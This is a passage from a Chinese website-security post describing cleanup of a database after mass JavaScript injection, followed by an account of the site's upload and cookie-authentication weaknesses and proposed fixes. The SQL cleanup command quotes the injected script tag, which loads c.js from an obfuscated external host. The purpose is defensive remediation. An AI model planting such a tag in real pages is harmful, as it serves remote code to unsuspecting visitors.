雖然，可以通過sql查詢分析器執(zhí)行批量代換，暫時(shí)解決被插入的js代碼問題，然而不從根本上解決整個(gè)網(wǎng)站存在的漏洞，包括程序上和權(quán)限，那么黑客還是隨時(shí)可以入侵你的網(wǎng)站數(shù)據(jù)庫。

    在sql查詢分析器里可以執(zhí)行以下的代碼批量替換js代碼：

“
update 表名 set 字段名=replace(字段名,'<script src=http://c.n%75clear3.com/css/c.js></script>','') ”

    flymorn仔細(xì)檢查了網(wǎng)站，發(fā)現(xiàn)網(wǎng)站存在幾個(gè)安全問題：

    第一，網(wǎng)站存在上傳漏洞；雖然，上傳文件需要管理員身份驗(yàn)證，也對(duì)上傳文件進(jìn)行了文件格式的認(rèn)證，但管理員身份驗(yàn)證采用了cookies，而cookies是可以被偽造的，而且如果上傳了圖片后，不對(duì)該文件的內(nèi)容采取任何判斷的話，那么圖片木馬也很有可能被上傳。

    解決措施：1 刪除上傳文件功能（不太實(shí)際）；2 修改上傳用戶驗(yàn)證為session驗(yàn)證；3 對(duì)上傳后的文件內(nèi)容進(jìn)行驗(yàn)證，如果是圖片木馬，則刪除；可以參考以下的驗(yàn)證代碼：